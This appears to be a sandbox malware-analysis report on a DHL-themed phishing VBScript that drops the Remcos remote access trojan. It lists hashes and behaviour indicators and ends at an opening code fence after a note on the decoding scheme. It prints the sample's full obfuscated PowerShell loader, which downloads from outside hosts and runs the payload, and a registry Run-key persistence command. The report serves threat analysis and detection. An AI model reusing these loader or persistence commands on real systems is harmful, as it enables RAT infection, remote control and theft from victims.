File name:

awb_DHL_Shipping_documents_delivery_26_05_2025_0000000000000_doc_25.vbs

Full analysis: https://app.any.run/tasks/f506bccb-7d0e-46da-b0e2-387fa64f14ff
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that gives attackers partial to complete control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Common RAT features include access to the user's data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: May 26, 2025, 15:35:09
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
remcos
rat
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

734499DF580858F2A3CE0C1A5EE80A51

SHA1:

FE5FCEC5BBCB6C53CB756A32C300801020D4844C

SHA256:

730DDAEE4641F6D6E15733FE2FAF26951A59935A97DF5B0317B8083D42886E82

SSDEEP:

768:uq4x9ndBnFMw26qGhLUotGWfxju4JdbjeofSqZ7icmfy:0nndBnFMwxwWGWNnJpqolUfy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 2384)
    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 2384)
    • Changes the autorun value in the registry

      • reg.exe (PID: 7012)
    • REMCOS has been detected (SURICATA)

      • msiexec.exe (PID: 5260)
    • REMCOS mutex has been found

      • msiexec.exe (PID: 5260)
      • msiexec.exe (PID: 3956)
    • Connects to the CnC server

      • msiexec.exe (PID: 5260)
  • SUSPICIOUS

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6028)
    • Gets a collection of all available drive names (SCRIPT)

      • wscript.exe (PID: 6028)
    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 6028)
      • powershell.exe (PID: 4976)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6028)
      • powershell.exe (PID: 4976)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 2384)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2384)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Starts CMD.EXE for commands execution

      • msiexec.exe (PID: 5260)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1164)
    • Connects to unusual port

      • msiexec.exe (PID: 5260)
    • Application launched itself

      • powershell.exe (PID: 4976)
    • Contacting a server suspected of hosting a CnC

      • msiexec.exe (PID: 5260)
  • INFO

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Returns hidden items found within a container (POWERSHELL)

      • conhost.exe (PID: 4880)
      • conhost.exe (PID: 2108)
      • conhost.exe (PID: 4696)
      • conhost.exe (PID: 5728)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Disables trace logs

      • powershell.exe (PID: 2384)
    • Checks proxy server information

      • powershell.exe (PID: 2384)
      • msiexec.exe (PID: 5260)
      • msiexec.exe (PID: 3956)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Manual execution by a user

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 4976)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 6048)
    • Reads security settings of Internet Explorer

      • msiexec.exe (PID: 5260)
      • msiexec.exe (PID: 3956)
    • Launch of the file from Registry key

      • reg.exe (PID: 7012)
    • Reads the software policy settings

      • msiexec.exe (PID: 5260)
      • slui.exe (PID: 4244)
    • Creates files or folders in the user directory

      • msiexec.exe (PID: 5260)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
146
Monitored processes
17
Malicious processes
7
Suspicious processes
1

Behavior graph

Processes in the graph, in launch order (#REMCOS marks the two msiexec.exe instances in which Remcos was detected): wscript.exe, powershell.exe, conhost.exe, sppextcomobj.exe, slui.exe, powershell.exe, conhost.exe, #REMCOS msiexec.exe, cmd.exe, conhost.exe, reg.exe, powershell.exe, conhost.exe, svchost.exe, powershell.exe, slui.exe, #REMCOS msiexec.exe

Process information

Each entry lists PID, CMD, Path and Parent process, followed by User, Company, Integrity Level, Description, Exit code, Version and loaded Modules.
PID: 1164
CMD: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Pridingly" /t REG_EXPAND_SZ /d "%Tilbagebetaling37% -windowstyle 2 $Trihedral=(g`p 'HKCU:\Software\Civilbeskyttelsernes\').'Bagsmkkerne';%Tilbagebetaling37% ($Trihedral)"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 2108
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2384"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-ChildItem;Get-Service;$Decadic=(gcm A:).CommandType;$Decadic=[String]$Decadic;$Clamative='Saddelgjorde';$Decadic+=':';(n`i -p $Decadic -n Septuagenarianism -value { param ($Minimeringer);$Clamative='Polyunsaturate253';$Hjtideligholdt143=3;$Plumbate='Epicentre';do {$Fjernkendingerne+=$Minimeringer[$Hjtideligholdt143];$Hjtideligholdt143+=4} until(!$Minimeringer[$Hjtideligholdt143])$Fjernkendingerne});(n`i -p $Decadic -n Chivalry -value {param ($Disorganise);.($Wickerworked) ($Disorganise)});ConvertTo-Html;$Bagholdene=Septuagenarianism 'PalNI deReoT ed.UngW';$Bagholdene+=Septuagenarianism 'EkseKnaBArsc UnLSmaIMicEPe,nK mt';$Pebrine=Septuagenarianism ' SaMK mo tazStaimodlen lMitaSem/';$Skattedepartementerne=Septuagenarianism 'Co,TPjklHe scen1 it2';$Lynfryser='Nar[ RanDemeKo TNoe.Ants eEPror PavDomiRs.c ee.elP ,jOBesI atNbegtPolMSh a FeN,ruaEl.gA.tERhiRBiu]Bet:Los:FinSKemeOveCMe,U Kor PaIS lTHusYSp P Srr aiOHettGafO ac M oBlal tr= ug$KanSMulK T aSuitunsTNe e .ed oE PaPM naEphRRedTN.keVr.M NeE anN SiTS aeLayrLasn.onE';$Pebrine+=Septuagenarianism 'Com5 ko.Ci 0 Re Job(YenW imiRenn G d Goo H,wSvesUdv CidN urT S M t1Fil0Pos.Erh0 N.;bep ,uW G.iIndnMo 6Cle4Sk ; nh Syvx ,l6Tvr4Fna;Not NarrErovKom:Bev1Hap3.el7Jas. Op0 Un) E. 
Ov,GCr,eforc ZekGynokon/Oms2Fi 0fru1E.e0Pe.0 ,h1Ki,0,il1Ald KraF NeiPrirRe,eKrifAn,o orxuni/ Hy1Teg3Skr7Fab.Pel0';$Loaferish209=Septuagenarianism 'C rULegS tueSrsrBl -PsyASymg haeBlnNToat';$Granulomatous=Septuagenarianism ' OkhUndtRgftP opDogs ,o:Akt/Ne,/R.gmBrua ver ovtE tiHjon A sNo m HyaSoutNoieDyrr.atierdaPnepGenrOvei KimOrtaD,f.encc MaoLenmOc,.Ba,bSperM,s/ ypaK,fd Klm Gen .d/SerSGo nGruuTrabTr,nDu.eEucsSc s ule AgsSik.StihReahJorpB w> BahSoltRubtE ep.ous ep:Cir/ A /Pa.sFormHjecF rs arhForiObspEyepGeni Omn ragBoddUndlParhKarlRam.MuscMono Jem Sh/AlmSAnkn .yuP ob L n D ekals HesSpeeCe s Sk.Fugh uhPanp';$Pampsychist=Septuagenarianism 'pal>';$Wickerworked=Septuagenarianism 'spriTraETe.x';$Overjoyousness='Netforbundet';$Mischaracterize='\Blres.Smr';Chivalry (Septuagenarianism 'Cr.$ TjgKyslProoE tbSpyaAfsL.aa:Bior CiE ShGSekisp.nMilAMul9Fod2Hui= Wo$PikEKronPu.vToc:T.paCoupI.pPP eDFinamilTJi,ASti+G,e$PumMSpriLibSSalcrochCenAColRRygaBylcme,TMo,E CiRXaniSkaZ TeE');Chivalry (Septuagenarianism ' um$ SaGC,mLLunoHymb G aLiglUno:PriUBe,nRevd S eK mVI faph,sCroT S a S.TLreISilNGanGFacl .myUns=Pyl$Da G,rgrKina LoNRv,uNskLToloRaeMC aab nTPejOI,tUKasSSpe..opSp,lPArglFl IAl.t Co(Pa $Yi.pDi AFl.MHeap U,s.leY Tecukrh VeI ySPactHys)');Chivalry (Septuagenarianism $Lynfryser);$Granulomatous=$Undevastatingly[0];$foveation=(Septuagenarianism 'Pol$Epig ulYieOR ebWieA W LUko:c cV MaiIntsSteiCroT ElE.alRDeneP nTSkj=.asN cET rWNea- hioinaB KajAmaE ElCDratHa. DroSDelYNe snottSorE ,imdel. St$MamB pra baGP nhUnfOD sLkrodDe eLinN,rye');Chivalry ($foveation);Chivalry (Septuagenarianism 'U,d$ PoVUngilinsP siDi tGlaePrirMileTekt Be.LufHDagebssa ,idUnse V,rslasInf[ ro$ roL Tho M a EufCloeStjrNi iNdlsU fh Bo2 r0Ar,9A h]fo = P $BobPG nePenbG.drMiriEngn,nde');$Anetts=Septuagenarianism 'FilDP ao.arwDetn .elIn oVanaUnfdTraFCa iOpsl Pre';$Jewbird=Septuagenarianism ' Sm$ .eVFo.iG.tsunpiInttBioeAnlrPlueAtltsar.Phi$B sAPosn uteS rt A,t Ins Un. 
S IAlsnEp v hooEcdk.unePro( Ov$Ki GGigrBrnaMixnTouuUnplhikoMi mD maSkotAu oUdvu rosLa ,una$HypRGreeBurpAagrOpfoad dDgeuligc LotEksoAnnrSamyDov)';$Reproductory=$Regina92;Chivalry (Septuagenarianism ' a$Re GAnelF eoUniB ReAL.zlCat: VePSikeCo.r I NOp i eeT Jar SmIDeocUnd=Daw(UnrTSt.eConsOpstB d-TyrPS iaWe THomhJac tj$MesrSupEHelPpolrM do .dD fkupriCMadtBlyo UlRBray A.)');while (!$pernitric) {Chivalry (Septuagenarianism ' la$ BlgA olRado yebUroaGajlAlk:bidADelx Sketa mPr,e ThnD,v=.pr$ColROkaoMisoMermPuns') ;Chivalry $Jewbird;Chivalry (Septuagenarianism ' ma[UnaTSanh emrIn,e FlA rsD KuIPhoNUr.g Ot.IniTNoohUn r.areScoAS ld ra]Fre:Uig:A rsan.L L,eAlge OpPUbi(ham4Fej0Tig0 ra0.ar)');Chivalry (Septuagenarianism ' Op$Sjag ,uLsjlOBetbVu ABilLUn.:Womp Y.E Smr Pen leIDostFljr UnIScocBig= l(etpT .aEGreS hat Aw-Uk.pPo.aReht,elHSys Pul$ EpRCh EConpBairSeao GuD V UBilCO etCaiokvgR okY .e)') ;Chivalry (Septuagenarianism ' po$Ba.GAnoLYdeOFa bSkoa igLpez:A ahproVBraIC sd AgeprmrPennEngeLan=Pl $apnGCo,L JaoKitBBagaPe LNon:GabT.tieK lrDusRBeaOL wrM,lRTane ovg KnISpuMBe EUpcNS aTMiseBiotagn1Hie4 Co4B t+End+Beb%fra$ anu PrnTrndF.kepr,V HaaRets.retSilaKakt ReiN nNTidgF rLFlaY.bd.In CBaloHiruT,sn.avt') ;$Granulomatous=$Undevastatingly[$Hviderne]}$Cannonry=380548;$Forstaaelsesrammerne=30204;Chivalry (Septuagenarianism 'Usp$ vigK plGraO.akBSkuAHjeLGum:U,su UnNfdsIKorNPrifkileMorrW saSunBp klDefY Un tra=S.l FluG SoenootD a-IceC eoCobNRomT SwEm.gNUd,tNat Uni$,reRLs.E RaP var nvoFatDBrouTilcUncTAleOpleRSynY');Chivalry (Septuagenarianism ' S $ sygDeul FeoHjebOutaRunlU.p: elOU,tvStre.ilrShidStunSeag nte Nis Le syn=Bea La.[ FiS DeyCats S tBiteSkrm,ri.UnpC,oroHrenGnivMole emrRebtTun]For:Rab:TraFIntrOveo omBalBResaTmmsPe.e ,k6Maa4,elS Int alrTiliBevnAn gGi (Vin$Te UKapnStaiStyn VofSpae BlrMa,a HubInflFo yNi.)');Chivalry (Septuagenarianism 'Sel$LatGvveLTa.OIntB traBa LH l: TvHCrovBi iG orArvV rlEkse DeRSew ,o=Udl ul[ N s.crYaraSBa t IneT mM o. 
ElT ,eeHa X DotCor.Be eFirnSimcMaxoSkrd.riiSenNCabGPa,] S.:gri:Prea ApsAspc coiV nIJou.BaggSureAd.tV nSSolT.niRVa IGaln erG yr(int$P rOMusVAfrEMa,rCanD GoNBalgJocEH xs Ka)');Chivalry (Septuagenarianism 'F i$Jaig OplI eo .hbReba .clGl,:SupEsknkGuns DiTTrarSamaT nASnoRterBEveeRevJSvuDJibeL.ar ilnLepET rsNon2P,n4Bet9Une=Ste$Ka hObsv pI atrLasvDobldise anRTon.DehsLemuFreBTrfS.uatFlurS iiMe.NSamGGro(Pre$StrcAbiaSednMedn PaoLudN pRUdsy Ma,ni $UdrfFreO SuRarbS ,ttDifA RaADivEJ nl iaSReteUnas UnRAr alummSliMU oeS arBenN .dEswa)');Chivalry $Ekstraarbejdernes249;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3888"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-ChildItem;Get-Service;$Decadic=(gcm A:).CommandType;$Decadic=[String]$Decadic;$Clamative='Saddelgjorde';$Decadic+=':';(n`i -p $Decadic -n Septuagenarianism -value { param ($Minimeringer);$Clamative='Polyunsaturate253';$Hjtideligholdt143=3;$Plumbate='Epicentre';do {$Fjernkendingerne+=$Minimeringer[$Hjtideligholdt143];$Hjtideligholdt143+=4} until(!$Minimeringer[$Hjtideligholdt143])$Fjernkendingerne});(n`i -p $Decadic -n Chivalry -value {param ($Disorganise);.($Wickerworked) ($Disorganise)});ConvertTo-Html;$Bagholdene=Septuagenarianism 'PalNI deReoT ed.UngW';$Bagholdene+=Septuagenarianism 'EkseKnaBArsc UnLSmaIMicEPe,nK mt';$Pebrine=Septuagenarianism ' SaMK mo tazStaimodlen lMitaSem/';$Skattedepartementerne=Septuagenarianism 'Co,TPjklHe scen1 it2';$Lynfryser='Nar[ RanDemeKo TNoe.Ants eEPror PavDomiRs.c ee.elP ,jOBesI atNbegtPolMSh a FeN,ruaEl.gA.tERhiRBiu]Bet:Los:FinSKemeOveCMe,U Kor PaIS lTHusYSp P Srr aiOHettGafO ac M oBlal tr= ug$KanSMulK T aSuitunsTNe e .ed oE PaPM naEphRRedTN.keVr.M NeE anN SiTS aeLayrLasn.onE';$Pebrine+=Septuagenarianism 'Com5 ko.Ci 0 Re Job(YenW imiRenn G d Goo H,wSvesUdv CidN urT S M t1Fil0Pos.Erh0 N.;bep ,uW G.iIndnMo 6Cle4Sk ; nh Syvx ,l6Tvr4Fna;Not NarrErovKom:Bev1Hap3.el7Jas. Op0 Un) E. 
Ov,GCr,eforc ZekGynokon/Oms2Fi 0fru1E.e0Pe.0 ,h1Ki,0,il1Ald KraF NeiPrirRe,eKrifAn,o orxuni/ Hy1Teg3Skr7Fab.Pel0';$Loaferish209=Septuagenarianism 'C rULegS tueSrsrBl -PsyASymg haeBlnNToat';$Granulomatous=Septuagenarianism ' OkhUndtRgftP opDogs ,o:Akt/Ne,/R.gmBrua ver ovtE tiHjon A sNo m HyaSoutNoieDyrr.atierdaPnepGenrOvei KimOrtaD,f.encc MaoLenmOc,.Ba,bSperM,s/ ypaK,fd Klm Gen .d/SerSGo nGruuTrabTr,nDu.eEucsSc s ule AgsSik.StihReahJorpB w> BahSoltRubtE ep.ous ep:Cir/ A /Pa.sFormHjecF rs arhForiObspEyepGeni Omn ragBoddUndlParhKarlRam.MuscMono Jem Sh/AlmSAnkn .yuP ob L n D ekals HesSpeeCe s Sk.Fugh uhPanp';$Pampsychist=Septuagenarianism 'pal>';$Wickerworked=Septuagenarianism 'spriTraETe.x';$Overjoyousness='Netforbundet';$Mischaracterize='\Blres.Smr';Chivalry (Septuagenarianism 'Cr.$ TjgKyslProoE tbSpyaAfsL.aa:Bior CiE ShGSekisp.nMilAMul9Fod2Hui= Wo$PikEKronPu.vToc:T.paCoupI.pPP eDFinamilTJi,ASti+G,e$PumMSpriLibSSalcrochCenAColRRygaBylcme,TMo,E CiRXaniSkaZ TeE');Chivalry (Septuagenarianism ' um$ SaGC,mLLunoHymb G aLiglUno:PriUBe,nRevd S eK mVI faph,sCroT S a S.TLreISilNGanGFacl .myUns=Pyl$Da G,rgrKina LoNRv,uNskLToloRaeMC aab nTPejOI,tUKasSSpe..opSp,lPArglFl IAl.t Co(Pa $Yi.pDi AFl.MHeap U,s.leY Tecukrh VeI ySPactHys)');Chivalry (Septuagenarianism $Lynfryser);$Granulomatous=$Undevastatingly[0];$foveation=(Septuagenarianism 'Pol$Epig ulYieOR ebWieA W LUko:c cV MaiIntsSteiCroT ElE.alRDeneP nTSkj=.asN cET rWNea- hioinaB KajAmaE ElCDratHa. DroSDelYNe snottSorE ,imdel. St$MamB pra baGP nhUnfOD sLkrodDe eLinN,rye');Chivalry ($foveation);Chivalry (Septuagenarianism 'U,d$ PoVUngilinsP siDi tGlaePrirMileTekt Be.LufHDagebssa ,idUnse V,rslasInf[ ro$ roL Tho M a EufCloeStjrNi iNdlsU fh Bo2 r0Ar,9A h]fo = P $BobPG nePenbG.drMiriEngn,nde');$Anetts=Septuagenarianism 'FilDP ao.arwDetn .elIn oVanaUnfdTraFCa iOpsl Pre';$Jewbird=Septuagenarianism ' Sm$ .eVFo.iG.tsunpiInttBioeAnlrPlueAtltsar.Phi$B sAPosn uteS rt A,t Ins Un. 
S IAlsnEp v hooEcdk.unePro( Ov$Ki GGigrBrnaMixnTouuUnplhikoMi mD maSkotAu oUdvu rosLa ,una$HypRGreeBurpAagrOpfoad dDgeuligc LotEksoAnnrSamyDov)';$Reproductory=$Regina92;Chivalry (Septuagenarianism ' a$Re GAnelF eoUniB ReAL.zlCat: VePSikeCo.r I NOp i eeT Jar SmIDeocUnd=Daw(UnrTSt.eConsOpstB d-TyrPS iaWe THomhJac tj$MesrSupEHelPpolrM do .dD fkupriCMadtBlyo UlRBray A.)');while (!$pernitric) {Chivalry (Septuagenarianism ' la$ BlgA olRado yebUroaGajlAlk:bidADelx Sketa mPr,e ThnD,v=.pr$ColROkaoMisoMermPuns') ;Chivalry $Jewbird;Chivalry (Septuagenarianism ' ma[UnaTSanh emrIn,e FlA rsD KuIPhoNUr.g Ot.IniTNoohUn r.areScoAS ld ra]Fre:Uig:A rsan.L L,eAlge OpPUbi(ham4Fej0Tig0 ra0.ar)');Chivalry (Septuagenarianism ' Op$Sjag ,uLsjlOBetbVu ABilLUn.:Womp Y.E Smr Pen leIDostFljr UnIScocBig= l(etpT .aEGreS hat Aw-Uk.pPo.aReht,elHSys Pul$ EpRCh EConpBairSeao GuD V UBilCO etCaiokvgR okY .e)') ;Chivalry (Septuagenarianism ' po$Ba.GAnoLYdeOFa bSkoa igLpez:A ahproVBraIC sd AgeprmrPennEngeLan=Pl $apnGCo,L JaoKitBBagaPe LNon:GabT.tieK lrDusRBeaOL wrM,lRTane ovg KnISpuMBe EUpcNS aTMiseBiotagn1Hie4 Co4B t+End+Beb%fra$ anu PrnTrndF.kepr,V HaaRets.retSilaKakt ReiN nNTidgF rLFlaY.bd.In CBaloHiruT,sn.avt') ;$Granulomatous=$Undevastatingly[$Hviderne]}$Cannonry=380548;$Forstaaelsesrammerne=30204;Chivalry (Septuagenarianism 'Usp$ vigK plGraO.akBSkuAHjeLGum:U,su UnNfdsIKorNPrifkileMorrW saSunBp klDefY Un tra=S.l FluG SoenootD a-IceC eoCobNRomT SwEm.gNUd,tNat Uni$,reRLs.E RaP var nvoFatDBrouTilcUncTAleOpleRSynY');Chivalry (Septuagenarianism ' S $ sygDeul FeoHjebOutaRunlU.p: elOU,tvStre.ilrShidStunSeag nte Nis Le syn=Bea La.[ FiS DeyCats S tBiteSkrm,ri.UnpC,oroHrenGnivMole emrRebtTun]For:Rab:TraFIntrOveo omBalBResaTmmsPe.e ,k6Maa4,elS Int alrTiliBevnAn gGi (Vin$Te UKapnStaiStyn VofSpae BlrMa,a HubInflFo yNi.)');Chivalry (Septuagenarianism 'Sel$LatGvveLTa.OIntB traBa LH l: TvHCrovBi iG orArvV rlEkse DeRSew ,o=Udl ul[ N s.crYaraSBa t IneT mM o. 
ElT ,eeHa X DotCor.Be eFirnSimcMaxoSkrd.riiSenNCabGPa,] S.:gri:Prea ApsAspc coiV nIJou.BaggSureAd.tV nSSolT.niRVa IGaln erG yr(int$P rOMusVAfrEMa,rCanD GoNBalgJocEH xs Ka)');Chivalry (Septuagenarianism 'F i$Jaig OplI eo .hbReba .clGl,:SupEsknkGuns DiTTrarSamaT nASnoRterBEveeRevJSvuDJibeL.ar ilnLepET rsNon2P,n4Bet9Une=Ste$Ka hObsv pI atrLasvDobldise anRTon.DehsLemuFreBTrfS.uatFlurS iiMe.NSamGGro(Pre$StrcAbiaSednMedn PaoLudN pRUdsy Ma,ni $UdrfFreO SuRarbS ,ttDifA RaADivEJ nl iaSReteUnas UnRAr alummSliMU oeS arBenN .dEswa)');Chivalry $Ekstraarbejdernes249;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 3956
CMD: "C:\WINDOWS\SysWOW64\msiexec.exe"
Path: C:\Windows\SysWOW64\msiexec.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
2
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 4244
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 4696
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4880
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4976
CMD: c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle 2 $Trihedral=(g`p 'HKCU:\Software\Civilbeskyttelsernes\').'Bagsmkkerne';c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Trihedral)
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
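The PowerShell stage started by wscript.exe (PID 2384) and re-run from the registry (PIDs 3888 and 4976) hides every string behind a padding scheme. `(gcm A:).CommandType` evaluates to "Function", so `n`i -p $Decadic -n Septuagenarianism` is New-Item on the Function: drive: it defines a function that starts at index 3 and keeps every fourth character of its argument, and `Chivalry` passes the decoded text to `iEx` (itself decoded from 'spriTraETe.x'). The following is an added example, not code from the report or from the sample: it re-implements that decoder in Python so the operands can be read without executing any of the script. The sample strings are copied from the PID 2384 command line above. Strings pasted from a rendered report can lose runs of spaces, so the example also checks that each string's length is a multiple of four, which a clean operand always is; a string that fails that check decodes to garbage from the damaged point onward.

```python
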